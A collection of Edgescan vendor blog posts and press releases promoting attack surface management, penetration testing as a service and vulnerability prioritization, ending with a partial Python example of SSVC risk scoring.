We don't expect our clients to be cybersecurity management experts, so everyone in the Edgescan support team is a seasoned security expert and penetration tester.
And, in order to understand and have a comprehensive view of our systems and workflows, each security analyst periodically rotates between the Edgescan support, consultancy, advisory, and software security departments. Our security pros also carry a range of industry credentials, including CREST, OSCP and CEH certifications. This ensures our "human element" is as knowledgeable and effective as possible in understanding and securing your organization.

#### The Edgescan Three-step Approach to Effective Cybersecurity Management

**Step 1. External Attack Surface Management (EASM)**

A Strong Security Posture Begins with Knowing Your Attack Surface. Issues revealed: What is exposed? What can potentially be hacked?

The first step in achieving a strong security posture is to accurately map, measure, then inventory your entire attack surface, including cloud services, hosts, network devices, web apps, APIs and more; you simply can't secure what you can't measure or see. Edgescan's External Attack Surface Management (EASM) provides immediate visibility of an enterprise's internet-facing estate and then continuously monitors the attack surface as it evolves and changes. It provides complete visibility and the flexibility for organizations to modify their change and deployment models whenever needed. With EASM you will discover and inventory subdomains and find related or obfuscated records that may direct an attacker to your internet footprint. Edgescan's EASM also includes continuous profiling and API discovery, a unique way to detect shadow APIs in real time and limit cyber threats.

**Step 2. Risk-based Vulnerability Management**

Go Beyond "Just Discovering" Vulnerabilities. Issues revealed: What weaknesses and exposures do we have? What level of threat are they to the business?

Once you have scoured your attack surface for weaknesses, you need to continuously monitor and detect all vulnerabilities and exposures across the full stack with high accuracy (Validation is King).
Then rank the vulnerabilities by business concerns and integrate tightly with support operations to ensure timely remediation of what matters most.

Accurate Vulnerability Intelligence: Edgescan provides a hybrid approach to VM (analyst firms are calling it risk-based vulnerability management, or RBVM), using a combination of automation to discover most vulnerabilities at scale, and cyber analytics coupled with human intervention to validate and triage unknown or more complex vulnerabilities. Our goal is to ensure we have no false positives and that discovered issues are risk rated.

Full-stack Coverage: The human element of the Edgescan solution ensures assessments get the coverage they need, and clients will not receive false positive alerts. 100% coverage in system and software testing is extremely hard to achieve because of the countless logical flows of code in applications, and the challenge increases as different technologies require different types of automation, whether they are APIs, JavaScript-heavy frameworks, cloud apps, or generic n-tier applications.

**Step 3. Penetration Testing as a Service**

A unique hybrid approach that delivers verified, risk-rated results. Issues revealed: How can a skilled attacker penetrate your environment?

Now that your security team is armed with EASM and RBVM intelligence, perform laser-focused resilience tests on 1) areas of concern; 2) complex areas not suited to automated scanning. Edgescan delivers Penetration Testing as a Service (PTaaS) to help organizations better manage risk, mitigate data breaches, maintain compliance, and increase safe business continuity. Our PTaaS uses the same user interface as our RBVM solution, as well as the same intelligence data. This integrated solution provides the ability to easily retest mitigated vulnerabilities on demand or via automation, without waiting on a consultant to execute any tests.
Our PTaaS experts are OSCP, CEH and CREST certified and deliver the rigor expected of any leading penetration test. PTaaS focuses on testing sensitive areas of an asset for vulnerabilities that cannot be uncovered through traditional vulnerability scanning and automation alone. This hybrid process of automation combined with human intelligence is what differentiates us from scanning tools and legacy services, providing real and actionable results.

I encourage you to also be retrospective and reconsider the effectiveness of your organization's security tools in protecting your critical assets and data. Perhaps you can also take three steps to better fortify your own organization. To better understand how Edgescan can help protect your environment, contact us.

### Forbes Article Summary: Prioritizing Systems and Data: Cybersecurity Resilience Against Ransomware

In the rapidly evolving landscape of cybersecurity threats, ransomware attacks have become a significant concern for organizations of all sizes. Despite the high-profile incidents making headlines, no entity should consider itself immune to this menace.

Forbes Technology Council members were invited to share thoughts on specific subjects, and collectively they have shared a range of essential considerations to help businesses prepare for and respond effectively to potential ransomware attacks. Among these insights, Eoin Keary, Co-Founder and CEO of Edgescan, emphasizes the crucial practice of prioritizing systems and data in terms of their operational significance. He advocates categorizing the organization's systems and data while applying additional security measures to fortify critical assets. In this dynamic environment, where threats are persistent and ever-evolving, the importance of resilience is clear.
Implementing layers of controls around vital systems and data can minimize the impact of breaches and ensure robust security.

Edgescan is committed to providing comprehensive cybersecurity solutions. The company recognizes that effective security strategies demand proactive risk management and the strategic allocation of resources. Businesses can enhance their preparedness against ransomware attacks and other cybersecurity challenges by applying a risk-based approach to security countermeasures. Edgescan's comprehensive approach to cybersecurity, encompassing risk-based vulnerability management, penetration testing, and attack surface management, underscores the company's commitment to providing effective solutions for today's cybersecurity challenges.

The full article is available online at Forbes.

### Penetration Testing Done Right

Learn why an effective pen testing solution must be a hybrid approach that leverages human intellect, advanced analytics and hard-core automation to effectively manage risk and cyber exposures.

Minimizing an organization's attack surface is an ever-evolving, continuous challenge for security professionals. Testing and securing any and all assets facing the public internet, including public clouds, private clouds, data centers and more, can be a daunting and never-ending task. An effective strategy must include penetration testing, vulnerability management, and attack surface management tools at a minimum, combined with a thorough incident response and remediation process. Without any one of these key components, the strategy is "weak," to say the least. Let's look at the first component of this strategy: penetration testing.

#### What is Penetration Testing?

Penetration testing, or "pentesting", is an established security best practice to find exploitable vulnerabilities and unintentional data exposure within an enterprise infrastructure.
While a myriad of pen testing tools from various vendors provide this capability, the technology and its use have evolved significantly in recent years. Now security teams should consider Penetration Testing as a Service (PTaaS) to deliver these essential security measures.

#### So, What Exactly is PTaaS?

PTaaS helps organizations better manage security risks, mitigate data breaches, and increase safe business continuity by leveraging a hybrid model that utilizes human intellect coupled with automation and analytics. Delivered as a service to offer greater scale, agility, and risk awareness, this type of assessment is essential for maintaining compliance with industry regulations and security frameworks within hybrid environments.

Edgescan's PTaaS solution does just that. It combines proprietary penetration testing tools, risk-rated vulnerability data, and human intervention, so that enterprises can adopt PTaaS to harden their attack surface regardless of the size or configuration of their multi-cloud or hybrid environment.

PTaaS is nothing new; as a matter of fact, Edgescan has been providing this service since 2016, and it is a fundamental solution of our platform.

#### How Does PTaaS Work?

An effective PTaaS offering is a hybrid solution that combines automation with human assessment, integrated with advanced vulnerability management and analytics. PTaaS can be used for web application security, APIs, cloud assets, and network devices, utilizing risk rating methodologies to prioritize remediation.

#### Edgescan Penetration Testing as a Service

PTaaS is a key component of the Edgescan Platform and is based on over seven years of technology and service evolution. The platform employs several risk scoring systems (i.e., CVSS, CISA KEV, EPSS) and our own Edgescan Validated Security Score (EVSS) to risk-rate results, with the goal of identifying and correcting any vulnerability: unknown, known, exploitable or otherwise.
The Edgescan PTaaS solution utilizes our security team's extensive technical expertise, as well as the entire suite of applications within the Edgescan platform, to provide vulnerability assessment, exposure validation, and risk ratings. Our security experts offer battle-hardened security experience combined with countless industry accreditations, such as CREST, OSCP, and CEH, to provide clients with deep wisdom and insight to readily resolve their security needs.

Edgescan is focused on testing sensitive areas of an asset and testing for vulnerabilities that cannot be uncovered through traditional vulnerability scanning alone. This hybrid penetration testing process of automation combined with human intelligence is what differentiates us from automated testing tools, scanning tools, and legacy services, providing real and actionable results. Retesting of vulnerabilities is included to help ensure fixes are robust and resilient.

#### Extending Beyond PTaaS with Vulnerability Management and EASM

A Unique Multi-Layered Approach that Differentiates Edgescan from Tools and Standalone Solutions

As I referenced earlier, a major advantage that Edgescan offers customers is that PTaaS is integrated into the overall Edgescan platform, which includes five essential security technologies, including Risk-based Vulnerability Management (RBVM), External Attack Surface Management (EASM), as well as web application and API testing. All of these technologies use a common, extensive data lake and an intuitive user interface, advancing vulnerability intelligence and simplifying operations and training. The "full stack" intelligence we garner from the combination of these tools is unparalleled in the industry and helps our customers manage their security posture. Competitive solutions offer the above capabilities in a piecemeal, disparate fashion that only makes VM more difficult and error prone for their customers.
So, I recommend the Edgescan multi-layered approach with integrated pentesting and vulnerability management:

- EASM – What is exposed? What can potentially be hacked? First, accurately detect and assess your entire attack surface, including cloud services, hosts, network devices, web apps, APIs and more.
- VM – What weaknesses do we have? Then continuously monitor and detect all vulnerabilities and exposures across the full stack with high accuracy (Validation is King). Rank them by business concerns and integrate tightly with support operations to ensure timely remediation of what matters most.
- PTaaS – What could a skilled attacker do to penetrate your environment? Now that your security team is armed with EASM and VM intelligence, perform laser-focused resilience tests on 1) areas of concern; 2) complex areas not suitable for automated testing (e.g., business logic) to determine the validity of any potential issues.

### APIs: The New "Silent Killer"

Why You Should Take Preventative Measures Now to Reduce Risk Through Unsecure APIs

High blood pressure is known as a "silent killer" because most people never felt there was an issue before they suffered a cardiac event. APIs are similar in that most enterprises don't realize they have gaps in coverage until it is too late. Cybersecurity professionals need to treat API security just as high blood pressure would be treated: the best way to prepare is to familiarize yourself with your risk and make proactive choices to mitigate that risk. For hypertension, that means getting a baseline set of vitals, understanding your family history, and perhaps switching to turkey and reducing the consumption of red meat. For your organization's APIs, that means identifying your APIs and then proactively scanning them for vulnerabilities.
When an API attack occurs, most organizations are unprepared because they didn't know they needed to secure their APIs, they attempted to secure them but treated them like web applications, or they simply lacked complete visibility of all their APIs. These issues emphasize the urgent need for a two-pronged approach to API security testing.

#### Unseen Threats: The Silent Predators

The most serious cybersecurity risks are increasingly coming via these "silent killers". This makes sense, since a higher percentage of web traffic is going through APIs; as recently discussed in Jyoti Bansal's article published by Forbes, "APIs account for over half the internet traffic in many countries." [1] Hidden risks such as the misconfiguration of cloud services and shadow IT can leave the back door wide open for attackers.

#### Enter Edgescan: Making the Invisible Visible

You simply can't defend what you don't know about. The "first step in API security is to discover and catalog all the APIs in your applications. This can be a complex task, as APIs are constantly added and updated." [2] The Edgescan Platform is a hybrid that combines automation, analytics, and human intelligence. Our newly released External Attack Surface Management solution scans your entire digital footprint and global IT ecosystem, including on-premises and cloud-based systems, eliminating potential gaps in coverage. Edgescan EASM is a great tool to expose any "silent killers" lurking in wait. By constantly monitoring your digital estate, Edgescan's EASM performs continuous asset profiling, discovers shadow IT, and provides remediation strategies to mitigate the associated risks. EASM provides full visibility across your public cloud, ensuring that any misconfigurations are promptly detected and rectified.

#### Keeping Up with the Changing Landscape

Edgescan's Full Stack Vulnerability Management (FSVM) solution ensures that vulnerabilities are verified, triaged, and remediated effectively.
As the cybersecurity landscape evolves, so too does the protection provided by the Edgescan platform. The Edgescan platform delivers validated vulnerability data that is rated for severity using the Edgescan Validated Security Score (EVSS). In addition, discovered vulnerabilities carry the following risk-based data to help you prioritize: EPSS (Exploit Prediction Scoring System), CISA KEV (CISA Known Exploited Vulnerabilities catalogue) and CVSS (Common Vulnerability Scoring System).

Forbes also recommends that, to ensure API security, organizations need to "implement common-sense policies to minimize risk." [3] This means scanning your APIs and performing penetration testing on a regular cadence, with the ability to perform ad hoc testing as well. It is vital to ensure that your APIs "should never expose more data than what is necessary to service the user," [4] and the most trusted method to determine whether an API can be abused is still a penetration test. In cybersecurity terms, the potential of APIs as "silent killers" is only now starting to be realized. That is why Edgescan is committed to shedding light on these threats and providing a comprehensive solution to protect your organization. We are here to help illuminate and eliminate your cyber risk when it comes to securing APIs, or any part of your infrastructure.

#### Conclusion

As we navigate this ever-evolving digital landscape, it is crucial to stay informed and well equipped against emerging threats. If you have any questions about how Edgescan can bolster your cybersecurity strategy, don't hesitate to get in touch with us.
References 1, 2, 3, 4: Jyoti Bansal, Your Biggest Cybersecurity Threat Is Something You've Never Heard Of, Forbes, March 2023, https://www.forbes.com/sites/forbestechcouncil/2023/03/30/your-biggest-cybersecurity-threat-is-something-youve-never-heard-of/?sh=5752da6764c

### How Deploying an EASM Solution Strengthens Your Security Posture

As you may recall, a few months ago I discussed how the Edgescan EPSS and CISA KEV mapping tools help with vulnerability prioritization and risk mitigation. I described our Risk-Based Vulnerability Management (RBVM) solution, which is designed to uncover weaknesses and exposures across the enterprise and provide breach predictability for each vulnerability. As a continuation of this topic, and following up on my statement that we are always developing tools to help you better prioritize and resolve risk in your hybrid IT environments, I'd like to introduce our new External Attack Surface Management solution.

#### Let's Start with the Basics about EASM

What is EASM? EASM is designed to solve a specific problem that arises as enterprises move ever faster with hybrid, multi-cloud IT deployment and change. This problem is amplified when clouds are commonplace and deployment is fast and furious. With this rapid time-to-market and quick deployment of new features comes increased risk: an organization's IT footprint and attack surface increase and evolve. As enterprise infrastructures change and evolve over time, effective cyber security typically does not keep pace. This is exemplified by systems being deployed that are unknown, not maintained or monitored, or unauthorized. A larger attack surface, in theory, requires more resources and processes to secure while presenting a higher chance of weaknesses going undiscovered. This results in a higher probability of breach.

Why deploy EASM?
In my experience, most breaches are not "complex" or exotic, but rather are due to simple weaknesses in systems that were overlooked and vulnerabilities that were not mitigated. In most cases, vulnerabilities are not mitigated because the cyber team did not know the system existed in the first place. EASM is a key product in the Edgescan platform that "investigates" your organization's presence on the Internet to help discover known and, more importantly, unknown deployed systems, servers, websites, APIs and applications. This results in a bill of materials addressing questions like "what assets do we have facing the Internet?" and "what is our exposure to public/unauthorized access?" Without specifically understanding the answers to these questions, you leave your organization at risk.

Why use Edgescan EASM? The Edgescan platform is the key to our advantage in the security threat mitigation industry. By integrating our strong PTaaS (Penetration Testing as a Service) with our RBVM and EASM solutions, and utilizing a common, extensive data lake, Edgescan keeps you readily informed of your enterprise-wide security posture as it changes, resulting in Continuous Threat Exposure Management (CTEM). No other offering on the market matches the breadth and depth of our integrated vulnerability prioritization and risk management solutions.

How is Edgescan EASM different? Edgescan is the industry leader in PTaaS and full stack RBVM, which provides our clients with an abundance of validated security metrics in terms of coverage, prioritization, MTTR and historical audit logs of a system's cyber security lifecycle. By combining EASM with PTaaS and RBVM, the Edgescan platform can inform you, in a single, unified view, of what systems are under cyber management, what level of rigor (depth) is being applied, and, more importantly, which of the discovered systems are not undergoing cybersecurity posture assessment, a.k.a. your "blind spots".
Key features of the Edgescan EASM include the following:

- Discovery of unknown systems deployed on the public Internet
- Subdomain enumeration and shadow IT enumeration
- API discovery
- Service discovery and exposure alerts
- Mapping across RBVM / PTaaS and discovered assets
- Unlimited investigations on demand
- Native cloud integration for continuous ASM

Integrated with the Edgescan platform, you get penetration testing as a service and risk-based vulnerability management, so you have continuous threat exposure management (CTEM) across your multi-cloud environment. With this new addition to our Edgescan platform, we extend our leadership in helping enterprises of all sizes continuously discover, monitor, and secure their evolving IT infrastructure. For more information on EASM, see the product details at https://edgescanstage.wpengine.com/the-platform/attack-surface-management/

### Press Release: Edgescan Releases Innovative External Attack Surface Management Solution

Edgescan's EASM Offering Provides Unprecedented Visibility and Continuous Monitoring to Optimize Enterprise Security

DUBLIN – JUNE 20, 2023 – Edgescan, the first fully integrated cybersecurity platform, announced today the release of its new External Attack Surface Management solution, offering unprecedented visibility and continuous monitoring to help secure organizations of all sizes.

Today's enterprises require a cloud-savvy security solution that effectively inventories, monitors, manages and protects their corporate assets across their digital footprint. Traditional ad hoc approaches and laborious, manual processes, combined with legacy tools, make the process complex, expensive, and "false positive" prone due to human error.
An essential way to gain complete visibility and control across a multi-cloud IT environment is an External Attack Surface Management (EASM) solution that uses a hybrid approach: a solution that provides automated risk-based vulnerability intelligence coupled with incident validation that leverages cyber analytics and human expertise.

"Edgescan's unique hybrid approach combines EASM with its award-winning PTaaS (Penetration Testing as a Service) and RBVM (Risk-based Vulnerability Management) solutions, providing organizations with an optimal view of risks and exposures, understanding exactly what assets exist and what level of security coverage is being applied," says Eoin Keary, Founder and CEO of Edgescan. "The outcome is detailed, actionable and validated vulnerability intelligence that provides risk prioritization for faster remediation and coverage assurance."

The Edgescan EASM solution solves the lack of visibility and slow remediation response challenges presented by legacy tools and manual processes, making it a cornerstone of any modern-day cybersecurity strategy. Integrated with Edgescan Penetration Testing as a Service (PTaaS) and Risk-based Vulnerability Management (RBVM) capabilities, EASM provides complete visibility and assessment across multi-cloud and on-premises infrastructures, allowing organizations to see and effectively secure their critical assets and applications. The solution provides the flexibility for organizations to easily modify their change management and deployment models whenever needed, to suit their business needs. Key capabilities of the Edgescan EASM solution include mapping, discovery, and inventory tracking of known DNS and, most importantly, unknown internet systems; exposing shadow IT and discovering and enumerating subdomains; customizable alerting and reporting of discovered anomalies and exposures; and more.
The overall benefits help security teams confidently discover and understand the security of their hybrid environments with continuous, proactive monitoring, while optimizing incident response and remediation.

#### About Edgescan

Edgescan is the first fully integrated cybersecurity platform that unifies all required security solutions into a single combative platform. These solutions include penetration testing as a service (PTaaS), full stack vulnerability management (FSVM), dynamic application security testing (DAST), external attack surface management (EASM), and API security testing. All vulnerability information gleaned from any assessment or test is added to a growing collection of intelligence that is stored in our data lake and shared amongst the solutions. The platform enables companies to view and map assets across their entire global attack surface and delivers validated vulnerability data, eliminating false positives. The platform reduces the complexity and overhead associated with tool proliferation, speeds up remediation and cuts operational costs, while reducing the risk associated with digital transformation and cloud deployments.

Contact:
Christine Carrig
Senior Vice President, Global Marketing
Edgescan
pr@edgescan.com

### Automation Vs. Talent: Cybersecurity Showdown

Which type of security assessment provides the most accurate and dependable results?

You should certainly expect, when a security assessment is delivered, that the majority of security vulnerabilities, and hopefully all critical and high-risk weaknesses, will be identified at the time of testing. This is a fair ask. When a threat actor goes poking around your systems you can be sure they are doing the same, looking for an easy "way in" so they can breach and pivot within your system with an aim to compromise. So, what is the best approach when it comes to visibility and accuracy?

Assessment options fall into two recognized categories, with a third I would like to present for consideration.

Two Recognized Categories:
Automation – Software testing tools2. Manual Assessment - Combination of tools, scripts, and human expertise. A solution to consider: Hybrid Solution – Automation + Human Intelligence + Analytics  Option 1:Automation/Software Testing Tools Option 2:Manual Assessment  Option 3:Hybrid Solution StrengthsScale/Volume,  On-demand, DevOps friendly (speed),  Continuous,  Cost effective Logical issue detectionAccurate / (should be) False positive freeComplex exploit detection, human curiosity (never underrate this.  Contextual awareness (aids priority of remediation. Complex issue detection Logical exploits discovery False positive free / accurate Prioritized   Scale/volume, On-demand,   DevOps friendly,  Coverage, metrics, supportWeaknesses Accuracy and Risk Rating Priority Coverage Depth (Logical vulnerabilities)  Requires expertise to validate output Not scalable Expensive,  Not on-demand,  Does not fit with DevOps etc.  Point-in-time scan.  No Metrics??! Not 100% automated?  Option 1: Automation/Software testing softwareStrengths:Scale/Volume,On-demand, DevOps friendly (speed),Continuous,Cost effective.Weaknesses:Accuracy and Risk Rating,Priority,Coverage,Depth (Logical vulnerabilities),Will always requires expertise to validate output. Option 2: Manual assessment of a systemCoupling of usage of human intelligence, tools, scripts and expertise.Strengths:Logical issue detection,Accurate / (should be) False positive free,Complex exploit detection, human curiosity (never underrate this),Contextual awareness (aids priority of remediation).Weaknesses:Not scalable,Expensive,Not on-demand,Does not fit with DevOps etc,Point-in-time scan,No Metrics?! Option 3: Hybrid Solution – Augmented with ExpertiseStrengths:Complex issue detection,Logical exploits discovery,False positive Free / AccuratePrioritizedScale/Volume, On-demand,DevOps friendly,Coverage, Metrics, Support. The Shoot OutAutomation and Testing Tools Vs. 
Manual AssessmentFor the point of this article let’s talk about options 1 & 2 above. If I talked about option 3 it might turn into a sales pitch as that is what Edgescan delivers and its worthy of a blog post on its own.We launched our 2023 Vulnerability Statistics Report which is compiled using data from thousands of vulnerability assessments and penetration tests over the past 12 months (to December 2022). One of the areas we focused on was evaluating results from an “automation Vs manual” standpoint and then mapped which “high and critical severity vulnerabilities“ were more than likely detected using automation vs. which require human know-how.The results are interesting in that automation tools (Scanners/DAST) detected 69% of the known critical and high severity vulnerabilities but missed the other 31%.In my 20 years’ experience the best (and most fun) vulnerabilities are related to poor authentication, poor authorization, or broken business logic.I’ve personally breached and compromised entire banks, ministries of finance and global enterprises via poor authorization and authentication controls. Both of which are not easily detected via automation.“Authorization is contextual; it is based on both the model and business process, which is unique per organization. Because of this, it is not a good candidate for automated assessment as tools don’t understand risk or context.” We decided to do this as a “thought leadership” exercise to convince folks that reliance on software-testing-software for vulnerabilities does not work alone – it’s like buying a shiny new electric drill. We are really buying the holes it makes and to make nice holes we need a competent user. 
The drill alone does not do very much. The same is true when we conduct a cyber assessment – what we should really care about is the output it delivers, and whether the approach to getting to that result provides reasonable assurance.

High and critical severity vulnerabilities typically not found by automation:

- Account Hijack vulnerability
- Bypass Client-Side Controls
- Bypass Security Question
- Concurrent Logins Permitted
- Error Handling (complex variants)
- Excessive Permissions / Authorization weakness
- Hard-coded Credentials (various)
- Information Disclosure (Contextual)
- Insecure Binary Code Functions
- Insecure password change functionality
- Insufficient Authorization
- Lack of anti-automation
- Lack of Multifactor Authentication
- Malicious File Upload
- Meta data found in files
- Meta data in PDF
- Multi Factor Authentication Not Enforced
- Password Policy Not Enforced Server-Side
- Password Reset Token Not Invalidated
- Security Question Not Enforced
- Session Fixation
- Session Hijacking
- Unauthenticated Access to Sensitive Resource
- Unrestricted File Upload
- User Enumeration
- Weak Password Policy

Conclusion:

From the data (pictured in the chart and table above) we can see that over 30% of high and critical severity vulnerabilities are not detected using automation alone. Sure, we can run automated cyber security assessments quickly and it costs relatively little (apart from the expertise to validate and prioritize the discovered issues), but we’re looking at attack surface blind spots amounting to circa 30% of all potential vulnerabilities to be discovered.

Automation alone, on average, only discovers 69% of all vulnerabilities. We have a 31% coverage blind spot with automation alone.

### Press Release: Edgescan Releases 2023 Vulnerability Statistics Report Revealing 33% of Vulnerabilities Discovered in 2022 were High or Critical Severity

DUBLIN – MARCH 8, 2023 – Edgescan, the first fully integrated cybersecurity platform, announced today the release of its 2023 Vulnerability Statistics Report.
The vulnerability data analyzed was collected from thousands of security assessments and penetration tests performed on millions of assets, utilizing the Edgescan Platform in 2022. Register for the report by accessing the 2023 Edgescan Vulnerability Stats Report.

The eighth edition of the report provides a statistical model of the most common weaknesses faced by enterprises, to enable data-driven decisions for managing risks and exposures more effectively. The statistical models are split across layers of the technology stack such as Web Application, API, and Device/Host layers. Additionally, we make a distinction in the data for four tiers of business sizes based on employee count, and a distinction between internet facing and internally facing assets.

“We are still not getting the basics right; in 2022 we’ve observed many very basic vulnerabilities, many of which are commonly leveraged by cybercrime. Continuous assessment, validation & prioritization will make a huge difference to any organization’s cybersecurity posture. All vulnerabilities are not created equal, and we must focus on what matters to protect our respective organizations and businesses,” said Eoin Keary, Founder and CEO of Edgescan.

The report provides insight into how quickly vulnerabilities are being fixed based on risk. Unfortunately, high rates of known (i.e., patchable) exploitable vulnerabilities are still being found, with working exploits in the wild being used by nation states and cyber-criminal groups against organizations who are slow to patch.
- Non-internet facing systems have a significant risk density, resulting in an easy time for criminals once the network perimeter is breached
- Mean Time to Remediation (MTTR) for Critical Severity vulnerabilities is 65 days
- 33% of all vulnerabilities across the full stack discovered in 2022 were either High or Critical Severity
- The most common application layer and API vulnerabilities are still Injection related
- 13.5% of vulnerabilities in an enterprise’s backlog are either high or critical severity
- 12% of all risk accepted vulnerabilities in 2022 were considered (in isolation) Critical Severity

New in this report is the way Edgescan looks at prioritization and risk scores. Since Edgescan employs several risk prioritization scoring mechanisms, we take a deeper look at the most common risks faced by organizations and look at the correlation of the various risk scoring methodologies.

Methodology of Data Collection

All vulnerability data analyzed for the Edgescan Vulnerability Statistics Report was collected from thousands of security assessments and penetration tests performed on millions of assets; this growing collection of intelligence is stored in our data lake and is used for analytics-based validation purposes amongst the solutions that comprise the Edgescan Platform. Vulnerability data was sourced from over 250 companies of various sizes, Fortune 500 to medium and small businesses, across 30 industry verticals.
Excerpt: The Eighth Edition of the report delves into Risk Density, Mean Time to Remediate (MTTR) critical vulnerabilities, and the convergence of vulnerability management and penetration testing output.

### 5 Reasons Why Agent-Based Scanning Can’t be Your Only Defense

As a baseline security prevention, agent-based scanning has become the norm for organizations that have WFH and BYOD policies. Because the endpoints for most organizations are on different networks, it would be impossible for a network-based vulnerability scanner to scan them all simultaneously. While agents serve a vital role in providing security for specific endpoints, they cannot be the end-all solution for effectively managing vulnerabilities and remediation processes, and here is why.

The agent-based scanning approach has five areas of concern:

1. Deployment and maintenance is time consuming and labor intensive: Installing agents on every device can be time-consuming and resource intensive. Updating those agents once they are installed is an arduous task.
2. Remediation prioritization is challenging due to accuracy issues: Agent-based scanners tend to produce a more detailed view of the vulnerabilities present in a specific system. Despite the detail, these agent-based scans tend to produce a high number of false positives and negatives, which can make it difficult to identify and prioritize the true vulnerabilities that need remediation.
3. The endpoint itself becomes a threat vector: Agent-based scanners can also be targeted by attackers, as they represent a point of entry into the system, which could lead to a compromise of the entire network.
4. Slows down performance: Agent-based scanners are resource heavy and might impact the performance of the system or device they are installed on.
5. Opens up compatibility issues: IoT devices and specialized hardware on your network might be using an operating system that is unsupported by an agent. These devices will have an IP address though, enabling them to be scanned by a network-based scanner.

Agent-based scanning is a decent tool to defend certain endpoints, but it simply cannot scale and is not an effective solution for organizations that require large-scale vulnerability scanning and vulnerability management. Not to mention that most scanners create a lot of noise, and a security team beleaguered by false positives is unable to properly rate risk, remediate vulnerabilities, or keep their security posture in good standing.

Breaches most often occur in public-facing assets, with “web applications [being] the number one vector.” [1] As Verizon points out, this fact highlights the value of continuously scanning public-facing assets, as these are the most used entry points for attackers. The performance impact of continuous agent-based scanning is quite significant when compared to the lighter touch of network-based vulnerability scanning. It’s important to employ agentless scanning alongside agent-based scanning to improve accuracy and breadth of coverage, while being conscious of your enterprise’s resources.
Verizon has coined the phrase “opportunistic attack sales funnel” to describe what has become best practice amongst bad actors, and I think it is an accurate process description: “[Hackers] start with scanning for IPs and open ports… then crawling for specific services… then testing for specific Common Vulnerabilities and Exposures (CVE)… [finally attempting] Remote Code Execution (RCE) to gain access to the system.” [2]

Think like an attacker and defend like one too

A network-based vulnerability scanner would more accurately emulate the workflow that most hackers are using, as described above. However, the Edgescan platform utilizes a hybrid approach that combines automation and expert validation from CREST/OSCP-certified pen testers. After all, hackers are humans, and it is important to use a similar combination of automation and human intelligence to the one they employ to monitor and safeguard your company assets – Edgescan's hybrid approach to vulnerability management and penetration testing as a service (PTaaS) provides that perspective.

See how we do it. Sign up for a demo today!

Sources:

1. Verizon Data Breach Investigation Report, page 15
2. Verizon Data Breach Investigation Report, page 31

https://www.verizon.com/business/resources/T208/reports/dbir/2022-data-breach-investigations-report-dbir.pdf

### The SSVC model will be challenged as a risk-rating system for industrial scale vulnerability prioritization due to required contextualization

Recently Edgescan deployed two tools to help with risk prioritization, namely EPSS and CISA KEV mapping. Both can be combined with CVSS and EVSS (Edgescan Validated Security Score) to help prioritize vulnerabilities across our clients’ estates.
As always, we are working on a few more tools to help with prioritization and we will formally announce them as they roll out. Another model I would like to introduce for consideration is the SSVC.

What is SSVC?

Another model used to prioritize vulnerabilities is the CISA SSVC (Stakeholder-Specific Vulnerability Categorization). SSVC is a customized decision tree model that assists in prioritizing vulnerability response, and it is currently being used by the United States government and their Agencies. The goal of SSVC is to assist in prioritizing the remediation of a vulnerability based on the impact successful exploitation would have. Check out the SSVC guidelines.

I find that the SSVC model looks very promising. The SSVC model is based on a number of environmental attributes associated with the discovered vulnerability, as follows:

- (State of) Exploitation: Evidence of active exploitation of a vulnerability. Does a publicly available proof of concept (PoC) exist? Is it actively being exploited? If no PoC exists, is there reliable evidence it is being exploited?
- Technical Impact: Technical impact of exploiting the vulnerability. Similar to severity on CVSS, and split into “partial” or “total” impact. “Total” means the impact will provide the attacker total control of the component being attacked.
- Automatable: Can an attacker rapidly cover an organization’s estate and commit widespread attacks? Can the exploit be automated? This obviously brings speed and scale into account. It’s considered not automatable if steps 1-4 of the kill chain—reconnaissance, weaponization, delivery, and exploitation—cannot be reliably automated for this vulnerability. This also has a contextual aspect in terms of vulnerability chaining (combining vulnerabilities) and the context in which the vulnerability is present. Every system is different and there may be compensating controls (e.g. multifactor authentication) which would prevent automation of the exploit.
- Mission Prevalence: Impact on mission essential functions of relevant entities. In CISA terms: “A mission essential function (MEF) is a function ‘directly related to accomplishing the organization’s mission as set forth in its statutory or executive charter.’” To me this means: if this system was compromised, would it affect my organisation’s “mission”? Could my business still operate? Will it adversely affect my business if a given system was taken over? This is highly contextual and is related to DR (Disaster Recovery) and BCP (Business Continuity Planning) plans determining the importance of a system to an organization.
- Public Well-Being Impact: Impacts of affected system compromise on humans. A cornerstone of information security, but often overlooked and rarely discussed in most organisations. Would the exploit put folks in peril? Certainly a case-by-case contextual decision.
- Mitigation Status: Status of available mitigations, workarounds, or fixes for the vulnerability. Mitigation status measures the degree of difficulty of mitigating the vulnerability in a timely manner. We examine whether there is a workable mitigation for the exploit. Certainly this is contextual and unique to each organisation, as everyone is different.

Once all this metadata is compiled per vulnerability, a decision can be made based on a decision tree documented here: https://www.cisa.gov/sites/default/files/publications/cisa-ssvc-guide%20508c.pdf

Figure 1. Decision Tree Representing Vulnerability Prioritization (Referenced from SSVC Guidelines)

This results in a decision to “track”, “track*”, “attend” or “act”, an “act” being the most proactive (fix the issue ASAP).

Overall, this is a very clever and simple model. But there are challenges when it comes to enterprise/high-volume vulnerability management: we need to bear in mind that risk is contextual, and rightly so.
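To make the decision points concrete, here is an added example (not Edgescan’s or CISA’s code) that derives the six attributes above from a vulnerability record, applies an illustrative outcome policy in place of the published decision tree, and reports a record as undecidable when the contextual metadata was never catalogued. The VulnRecord schema, the placeholder CVE ids and the policy thresholds are assumptions made for this example.

```python
"""Evaluate SSVC-style decision points over vulnerability records.

Added example for this article, not Edgescan's or CISA's code. The outcome
policy in decide() is a simplified, illustrative mapping written for this
example, not the decision tree published in the CISA SSVC guide.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class VulnRecord:
    """One vulnerability plus the context SSVC needs (assumed schema).
    Fields left as None model context the organisation never catalogued."""
    cve: str
    asset: str
    public_poc: bool = False
    in_cisa_kev: bool = False                    # KEV listing = evidence of active exploitation
    total_control: Optional[bool] = None         # True: attacker gains total control of the component
    exploit_automatable: Optional[bool] = None   # kill-chain steps 1-4 scriptable in isolation?
    compensating_controls: Tuple[str, ...] = ()  # e.g. ("mfa",) as the article mentions
    mission_essential: Optional[bool] = None     # supports a mission essential function?
    well_being_impact: Optional[str] = None      # "minimal" | "material" | "irreversible"
    mitigation_available: Optional[bool] = None  # workable fix or workaround exists?


def decision_points(r: VulnRecord) -> Tuple[Dict[str, Optional[str]], List[str]]:
    """Derive the six decision points the article lists and name the unknown ones."""
    points: Dict[str, Optional[str]] = {}

    # (State of) Exploitation: a KEV listing outranks a mere public PoC.
    points["exploitation"] = "active" if r.in_cisa_kev else ("poc" if r.public_poc else "none")

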